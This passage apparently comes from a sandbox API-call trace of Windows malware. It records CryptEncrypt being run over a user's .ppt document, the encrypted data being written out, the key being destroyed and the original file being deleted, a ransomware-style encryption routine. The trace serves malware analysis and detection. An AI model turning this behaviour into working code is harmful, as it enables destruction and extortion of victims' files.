lpMem=0x43e2c50 | out: hHeap=0x1780000) returned 1 [0081.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37a0 | out: hHeap=0x1780000) returned 1 [0081.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b50 | out: hHeap=0x1780000) returned 1 [0081.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3830 | out: hHeap=0x1780000) returned 1 [0081.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bd0 | out: hHeap=0x1780000) returned 1 [0081.560] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0081.560] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1797048, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0081.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3608 | out: hHeap=0x1780000) returned 1 [0081.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0081.560] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0081.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0081.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c20 | out: hHeap=0x1780000) returned 1 [0081.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2be0 | out: hHeap=0x1780000) returned 1 [0081.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ce0 | out: hHeap=0x1780000) returned 1 [0081.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bf0 | out: hHeap=0x1780000) returned 1 [0081.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d10 | out: hHeap=0x1780000) returned 1 [0081.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b90 | out: hHeap=0x1780000) returned 1 [0081.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0081.560] CryptGetKeyParam (in: hKey=0x41ac740, dwParam=0x7, pbData=0x43e2990, pdwDataLen=0x144db58, dwFlags=0x0 | out: pbData=0x43e2990*=0x6610, pdwDataLen=0x144db58*=0x4) returned 1 [0081.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3620 | out: hHeap=0x1780000) returned 1 [0081.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bd0 | out: hHeap=0x1780000) returned 1 [0081.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3608 | out: hHeap=0x1780000) returned 1 [0081.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3740 | out: hHeap=0x1780000) returned 1 [0081.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b90 | out: hHeap=0x1780000) returned 1 [0081.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37a0 | out: hHeap=0x1780000) returned 1 [0081.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3698 | out: hHeap=0x1780000) returned 1 [0081.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c50 | out: hHeap=0x1780000) returned 1 [0081.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3680 | out: hHeap=0x1780000) returned 1 [0081.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3698 | out: hHeap=0x1780000) returned 1 [0081.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c00 | out: hHeap=0x1780000) returned 1 [0081.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3668 | out: hHeap=0x1780000) returned 1 [0081.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3800 | out: hHeap=0x1780000) returned 1 [0081.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b50 | out: hHeap=0x1780000) returned 1 [0081.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37d0 | out: hHeap=0x1780000) returned 1 [0081.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3860 | out: hHeap=0x1780000) returned 1 [0081.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d20 | out: hHeap=0x1780000) returned 1 [0081.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35a8 | out: hHeap=0x1780000) returned 1 [0081.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c80 | out: hHeap=0x1780000) returned 1 [0081.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bb0 | out: hHeap=0x1780000) returned 1 [0081.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d00 | out: hHeap=0x1780000) returned 1 [0081.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bc0 | out: hHeap=0x1780000) returned 1 [0081.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cf0 | out: hHeap=0x1780000) returned 1 [0081.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0170 | out: hHeap=0x1780000) returned 1 [0081.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3818 | out: hHeap=0x1780000) returned 1 [0081.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0081.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0c0 | out: hHeap=0x1780000) returned 1 [0081.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb108 | out: hHeap=0x1780000) returned 1 [0081.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0f0 | out: hHeap=0x1780000) returned 1 [0081.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1e0 | out: hHeap=0x1780000) returned 1 [0081.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1c8 | out: hHeap=0x1780000) returned 1 [0081.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb390 | out: hHeap=0x1780000) returned 1 [0081.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1f8 | out: hHeap=0x1780000) returned 1 [0081.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb420 | out: hHeap=0x1780000) returned 1 [0081.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb408 | out: hHeap=0x1780000) returned 1 [0081.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3f0 | out: hHeap=0x1780000) returned 1 [0081.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb438 | out: hHeap=0x1780000) returned 1 [0081.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb468 | out: hHeap=0x1780000) returned 1 [0081.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb450 | out: hHeap=0x1780000) returned 1 [0081.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb498 | out: hHeap=0x1780000) returned 1 [0081.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cd0 | out: hHeap=0x1780000) returned 1 [0081.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2bd8 | out: hHeap=0x1780000) returned 1 [0081.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0081.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb480 | out: hHeap=0x1780000) returned 1 [0081.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb4b0 | out: hHeap=0x1780000) returned 1 [0081.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3a8 | out: hHeap=0x1780000) returned 1 [0081.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3c0 | out: hHeap=0x1780000) returned 1 [0081.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3788 | out: hHeap=0x1780000) returned 1 [0081.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3d8 | out: hHeap=0x1780000) returned 1 [0081.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3710 | out: hHeap=0x1780000) returned 1 [0081.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0081.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0081.562] PeekMessageW (in: lpMsg=0x144e18c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e18c) returned 0 [0081.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3668 | out: hHeap=0x1780000) returned 1 [0081.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea958 | out: hHeap=0x1780000) returned 1 [0081.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c90 | out: hHeap=0x1780000) returned 1 [0081.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0081.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37a0 | out: hHeap=0x1780000) returned 1 [0081.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3710 | out: hHeap=0x1780000) returned 1 [0081.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9c68 | out: hHeap=0x1780000) returned 1 [0081.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b30 | out: hHeap=0x1780000) returned 1 [0081.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c90 | out: hHeap=0x1780000) returned 1 [0081.562] PeekMessageW (in: lpMsg=0x144e18c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e18c) returned 0 [0081.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cc0 | out: hHeap=0x1780000) returned 1 [0081.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cf0 | out: hHeap=0x1780000) returned 1 [0081.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b40 | out: hHeap=0x1780000) returned 1 [0081.563] PeekMessageW (in: lpMsg=0x144e18c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e18c) returned 0 [0081.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cf0 | out: hHeap=0x1780000) returned 1 [0081.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b90 | out: hHeap=0x1780000) returned 1 [0081.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d88 | out: hHeap=0x1780000) returned 1 [0081.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ce0 | out: hHeap=0x1780000) returned 1 [0081.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b40 | out: hHeap=0x1780000) returned 1 [0081.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cf0 | out: hHeap=0x1780000) returned 1 [0081.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ba0 | out: hHeap=0x1780000) returned 1 [0081.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3770 | out: hHeap=0x1780000) returned 1 [0081.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b30 | out: hHeap=0x1780000) returned 1 [0081.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2728 | out: hHeap=0x1780000) returned 1 [0081.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0081.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3860 | out: hHeap=0x1780000) returned 1 [0081.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3788 | out: hHeap=0x1780000) returned 1 [0081.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0081.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bc0 | out: hHeap=0x1780000) returned 1 [0081.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac180 | out: hHeap=0x1780000) returned 1 [0081.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9338 | out: hHeap=0x1780000) returned 1 [0081.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3590 | out: hHeap=0x1780000) returned 1 [0081.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3728 | out: hHeap=0x1780000) returned 1 [0081.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3848 | out: hHeap=0x1780000) returned 1 [0081.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35f0 | out: hHeap=0x1780000) returned 1 [0081.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bd0 | out: hHeap=0x1780000) returned 1 [0081.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0081.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f28 | out: hHeap=0x1780000) returned 1 [0081.564] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0081.564] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0081.564] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0081.564] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0081.566] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0081.566] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0081.566] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43c37a0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0081.566] CryptEncrypt (in: hKey=0x41ac740, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e088*=0x17655, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e088*=0x17660) returned 1 [0081.566] CharLowerBuffW (in: lpsz="byte[95841]", cchLength=0xb | out: lpsz="byte[95841]") returned 0xb [0081.568] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0081.568] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0081.568] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0081.568] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43c3a10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0081.569] CryptEncrypt (in: hKey=0x41ac740, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48f0048*, pdwDataLen=0x144e088*=0x17655, dwBufLen=0x17660 | out: pbData=0x48f0048*, pdwDataLen=0x144e088*=0x17660) returned 1 [0081.569] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0081.569] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0081.569] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0081.570] WriteFile (in: hFile=0x298, lpBuffer=0x49076b0*, nNumberOfBytesToWrite=0x17660, lpNumberOfBytesWritten=0x144ea8c, lpOverlapped=0x0 | out: lpBuffer=0x49076b0*, lpNumberOfBytesWritten=0x144ea8c*=0x17660, lpOverlapped=0x0) returned 1 [0081.572] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0081.573] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0081.573] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0081.573] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0081.573] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43cb168, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0081.573] CryptDestroyKey (hKey=0x41ac740) returned 1 [0081.573] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0081.573] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0081.573] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0081.582] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0081.582] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0081.582] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0081.582] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0081.582] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0081.582] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0081.582] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0081.582] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1797088, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0081.582] CryptReleaseContext (hProv=0x41a40c8, dwFlags=0x0) returned 1 [0081.582] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0081.582] FreeLibrary (hLibModule=0x756e0000) returned 1 [0081.582] CloseHandle (hObject=0x258) returned 1 [0081.583] CloseHandle (hObject=0x298) returned 1 [0081.608] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\HGH4Uw7jgwUTEi7Vo_.ppt", nBufferLength=0x7fff, lpBuffer=0x143ea88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\HGH4Uw7jgwUTEi7Vo_.ppt", lpFilePart=0x0) returned 0x47 [0081.608] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\HGH4Uw7jgwUTEi7Vo_.ppt" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\wz9w\\hgh4uw7jgwutei7vo_.ppt")) returned 0x20 [0081.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0081.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0081.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0081.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0081.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0081.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0081.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0081.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0081.608] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\HGH4Uw7jgwUTEi7Vo_.ppt", lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7888de10, ftCreationTime.dwHighDateTime=0x1d5e9d1, ftLastAccessTime.dwLowDateTime=0xfccc9c0, ftLastAccessTime.dwHighDateTime=0x1d5ec6c, ftLastWriteTime.dwLowDateTime=0xfccc9c0, ftLastWriteTime.dwHighDateTime=0x1d5ec6c, nFileSizeHigh=0x0, nFileSizeLow=0x17655, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="HGH4Uw7jgwUTEi7Vo_.ppt", cAlternateFileName="HGH4UW~1.PPT")) returned 0x41ac180 [0081.608] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\HGH4Uw7jgwUTEi7Vo_.ppt" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\wz9w\\hgh4uw7jgwutei7vo_.ppt")) returned 1 [0081.655] FindNextFileW (in: hFindFile=0x41ac180, lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7888de10, ftCreationTime.dwHighDateTime=0x1d5e9d1, ftLastAccessTime.dwLowDateTime=0xfccc9c0, ftLastAccessTime.dwHighDateTime=0x1d5ec6c, ftLastWriteTime.dwLowDateTime=0xfccc9c0, ftLastWriteTime.dwHighDateTime=0x1d5ec6c, nFileSizeHigh=0x0, nFileSizeLow=0x17655, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="HGH4Uw7jgwUTEi7Vo_.ppt", cAlternateFileName="HGH4UW~1.PPT")) returned 0 [0081.656] FindClose (in: hFindFile=0x41ac180 | out: hFindFile=0x41ac180) returned 1 [0081.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4359cd8 | out: hHeap=0x1780000) returned 1 [0081.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0081.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0081.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0081.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050fa8 | out: hHeap=0x1780000) returned 1 [0081.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0081.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0081.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0081.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0081.656] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0081.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac440 | out: hHeap=0x1780000) returned 1 [0081.657] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0081.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0081.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0081.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0081.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0081.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0081.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0081.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0081.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0081.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0081.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cc1c8 | out: hHeap=0x1780000) returned 1 [0081.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0081.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0081.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0081.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0081.657] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 